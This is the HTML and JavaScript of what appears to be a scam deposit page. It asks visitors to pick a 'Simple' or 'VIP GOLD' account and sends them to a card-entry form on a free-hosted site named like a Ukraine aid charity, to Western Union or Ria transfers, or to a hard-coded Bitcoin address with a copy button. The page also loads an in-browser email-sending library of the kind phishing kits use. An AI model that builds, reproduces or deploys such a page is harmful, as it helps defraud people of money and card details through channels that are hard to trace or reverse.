<!DOCTYPE html>
<html lang ="en">
<head>
<meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script> 
  <script src="https://smtpjs.com/v3/smtp.js"></script> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js" crossorigin="anonymous"></script>
<script src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
</head>
<style>
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');

*{
    margin:0;
    padding:0;
    box-sizing: border-box;
 }
 .atn button{
   font-size:17px; 
  font-family: "Archivo Black", sans-serif; 
    margin-left:3.5%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:93%;
  height:45px;
  background-color: rgb(21,101,192);
  border: none;
  border-radius: 2px;
  cursor: pointer;
  color:white;
  margin:;
 }
 .button img {
    margin-top:1%;
  margin-right: 10px;
  margin-right: ;
  width: 20px;
  height: 20px;
}
 .btn button{
     font-size:17px; 
    color:black;
    background-color:rgb(255,193,7);
font-family: "Archivo Black", sans-serif; 
    margin-left:3.5%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:93%;
  height:45px;
  border: none;
  border-radius: 2px;
  cursor: pointer;
  color:;
  margin:;
 }
 e{
     opacity:0;
 }
 .Text{
     margin-left:5%;
     margin-right:5%;
    font-family: "Archivo Black", sans-serif;  
 }
 .img img{
     margin-top:-5%;
     width:100px;
 }
 .omg img{
     margin-top:-10%;
     margin-left:28%;
     width:150px;
      }
      ab{
          opacity:70%;
          margin-left:17%;
          font-size:13px;
       font-family: "Archivo Black", sans-serif;     
      }
      .otn button{
        font-size:
    background-color:deepskyblue;
font-family: "Archivo Black", sans-serif; 
    margin-left:17%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:70%;
  height:30px;
  border: 1px solid #777;
  border-radius: 5px;
  cursor: pointer;
  margin:; 
      }
      .otn img{
          margin-top:1%;
  margin-right: 10px;
  margin-right: ;
  width: 50px;
  height: 20px;
      }
      .ttn button{
      font-size:
    color:black;
font-family: "Archivo Black", sans-serif; 
    margin-left:17%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:70%;
  height:30px;
  border: 1px solid #777;
  border-radius: 5px;
  cursor: pointer;
  color:;
  margin:;  
       
      }
      .ttn img{
          margin-top:1%;
  margin-right: 10px;
  margin-right: ;
  width: 30px;
  height: 20px;
      }
      .ctn button{
     font-size:
    color:black;
font-family: "Archivo Black", sans-serif; 
    margin-left:17%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:70%;
  height:30px;
  border: 1px solid #777;
  border-radius: 5px;
  cursor: pointer;
  color:;
  margin:;  
        
      }
      .ctn img{
          margin-top:1%;
  margin-right: 10px;
  margin-right: ;
  width: 30px;
  height: 20px;
      }
      .ltn button{
     font-size:
    color:black;
font-family: "Archivo Black", sans-serif; 
    margin-left:17%;
    margin-top:3%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  width:70%;
  height:30px;
  border: 1px solid #777;
  border-radius: 5px;
  cursor: pointer;
  color:;
  margin:;  
        
      }
      .ltn img{
          margin-top:1%;
  margin-right: 10px;
  margin-right: ;
  width: 30px;
  height: 20px;
      }
      .alert2{
          background-color:white;
          margin-top:-60%;
          display:none;
          margin-left:13%;
          padding:2%;
          font-family: 'Poppins', sans-serif;
 font-size:13px;
      border:1px solid #777;
     width:75%;
     height :210px; 
     border-radius:5px;
     position: relative;
  top: 0;
  left: 0;
      }
      a{
          text-decoration:none;
      }
      p{
          font-size:8px;
       font-family: "Archivo Black", sans-serif;  
       color: rgb(21,101,192);
      }
      
      .text2{
          margin-left:5%;
          margin-right:5%;
      }
      .text2 button{
          font-size:
    color:black;
font-family: "Archivo Black", sans-serif; 
    margin-left:43%;
    margin-top:5%;
  display: flex;
  align-items: center;
  justify-content: flex-start;
  padding:3%;
  border: 1px solid #777;
  border-radius: 5px;
  cursor: pointer;
  color:;
  margin:;  
      }
      i{
          font-size:20px;
          color:green;
      }
      ac{
        font-family: "Archivo Black", sans-serif;  
      }
      .copi{
          margin-left:15%;
          margin-top:-17%;
          color:green;
        position :fixed; 
      }
    </style>
<body>

<div id="google_translate_element"></div><br>

<div class="img"><img src="https://i.postimg.cc/2yVCd6G7/deposit-money-in-bank-10680934-8606907.gif"></div>

<div class="omg"><img src="https://i.postimg.cc/25GYPvXx/wallet-deposit-6264400-5203600.gif"></div>

<div class="Text">In which account do you want to make the deposit?</div><br>
<div class="atn">
<button class="button"><e>Okoko</e><img src="https://i.postimg.cc/Hxj2r11b/2024-02-05-07-31-46-505.png" alt="Image du bouton">Simple Account</button></div>

<div id="infosimple" class="infosimple">
<ab>Payment system available</ab>
<div class="otn">
<a href="https://ukraineonghelpforallukraine.on.drv.tw/okcard-1.html"><button type="button"><img src="https://i.postimg.cc/Jhj7yFbG/235-2355689-american-express-mastercard-and-visa-logos-visa.jpg">Visa/MasterCard</button></a></div><br>
</div></div>


<div class="btn">
<button class="button" id="lbt"><e>Okoko</e><img src="https://i.postimg.cc/3RnvRVJN/7c72.gif" alt="Image du bouton">VIP GOLD Account</button></div>
<div id="infogold" class="infogold">
<ab>Payment system available</ab>
<div class="otn">
<a href="https://ukraineonghelpforallukraine.on.drv.tw/okcard-1.html"><button type="button"><e>ok</e><img src="https://i.postimg.cc/Jhj7yFbG/235-2355689-american-express-mastercard-and-visa-logos-visa.jpg">Visa/MasterCard</button></a></div>
<div class="ttn">
<a href="https://www.westernunion.com/fr/fr/home.html"><button type="button"><e>ok</e><img src="https://i.postimg.cc/Z5TZbYkb/1200px-Logo-Western-Union-svg.png">Western Union</button></a></div>
<div class="ctn">
<a href="https://www.riamoneytransfer.com/fr-fr/"><button type="button"><e>ok</e><img src="https://i.postimg.cc/SNmRSPLv/RIA-2016-imtc.jpg">Ria</button></a></div>
<div class="ltn">
<a href="#"><button type="button"><e>ok</e><img src="https://i.postimg.cc/VkdY5PJD/bitcoin-btc-logo.png">Crypto Bitcoin</button></a></div>
</div></div>

<div class="alert2">
<div class="text2">
Please use the following Bitcoin address to make your deposit with Bitcoin. Make sure to use the right network or you lose your money :<br><br>
<ac>Adress BTC:</ac>
<p id="btcAddress">1DNYSXoXQTPTRFMFm9HyxxvDFPtYAw7Dcx <i class="fa-solid fa-copy" onclick="copyToClipboard('btcAddress')"></i>
</p>
<div class="copi" id="copi" style="display:none;">Copied Successfully</div> 
<button type="button">Ok</button></div>
</div>
    </body>
      <script>
         
        
           function googleTranslateElementInit() {
  new google.translate.TranslateElement({ 
    pageLanguage: 'en', 
    layout: google.translate.TranslateElement.InlineLayout.SIMPLE,
    includedLanguages: 'fr,cs,es,de,pt'
  }, 'google_translate_element');
}

// Rendre "infosimple" invisible par défaut
document.getElementById("infosimple").style.display = "none";

// Rendre "infogold" invisible par défaut
document.getElementById("infogold").style.display = "none";

// Fonction pour afficher "infosimple" lorsqu'on clique sur le bouton "Simple Account"
document.querySelector(".atn button").addEventListener("click", function() {
  document.getElementById("infosimple").style.display = "block";
});

// Fonction pour afficher "infogold" lorsqu'on clique sur le bouton "VIP GOLD Account"
document.querySelector(".btn button").addEventListener("click", function() {
  document.getElementById("infogold").style.display = "block";
});

// Récupérer les éléments du DOM
const cryptoBitcoinButton = document.querySelector('.ltn button');
const okButton = document.querySelector('.alert2 button');
const alert2Div = document.querySelector('.alert2');

// Ajouter un écouteur d'événement sur le bouton "Crypto Bitcoin"
cryptoBitcoinButton.addEventListener('click', function() {
  alert2Div.style.display = 'block'; // Afficher le div "alert2" en changeant la valeur de la propriété d'affichage à 'block'
});

// Ajouter un écouteur d'événement sur le bouton "Ok"
okButton.addEventListener('click', function() {
  alert2Div.style.display = 'none'; // Cacher le div "alert2" en changeant la valeur de la propriété d'affichage à 'none'
});

// Fonction pour copier le texte dans le presse-papier
function copyToClipboard(elementId) {
  var element = document.getElementById(elementId); // Récupérer l'élément HTML par son ID
  var text = element.textContent; // Récupérer le texte de l'élément

  // Créer un élément textarea temporaire
  var tempTextarea = document.createElement('textarea');
  tempTextarea.style.position = 'fixed'; // Le rendre fixe pour éviter qu'il ne soit visible
  tempTextarea.style.opacity = 0;
  tempTextarea.value = text; // Définir la valeur du textarea comme le texte à copier
  document.body.appendChild(tempTextarea); // Ajouter le textarea temporaire à la page

  // Sélectionner et copier le texte dans le presse-papier
  tempTextarea.select();
  document.execCommand('copy');

  // Supprimer le textarea temporaire
  document.body.removeChild(tempTextarea);
}

// Récupérer l'icône à partir du bouton
var copyIcon = document.querySelector('.fa-solid.fa-copy');

// Ajouter un événement de clic à l'icône
copyIcon.addEventListener('click', function() {
  var btcAddress = document.getElementById('btcAddress'); // Récupérer l'élément p contenant l'adresse BTC
  copyToClipboard(btcAddress.id); // Appeler la fonction copyToclipboard en passant l'ID de l'élément p
});

function copyToClipboard(elementId) {
    var btcAddress = document.getElementById(elementId);
    var range = document.createRange();
    range.selectNode(btcAddress);
    window.getSelection().removeAllRanges();
    window.getSelection().addRange(range);
    document.execCommand("copy");
    window.getSelection().removeAllRanges();
    
    var copiDiv = document.getElementById('copi');
    copiDiv.style.display = 'block';
    setTimeout(function() {
      copiDiv.style.display = 'none';
    }, 3000);
  }


      </script>
      </html>
      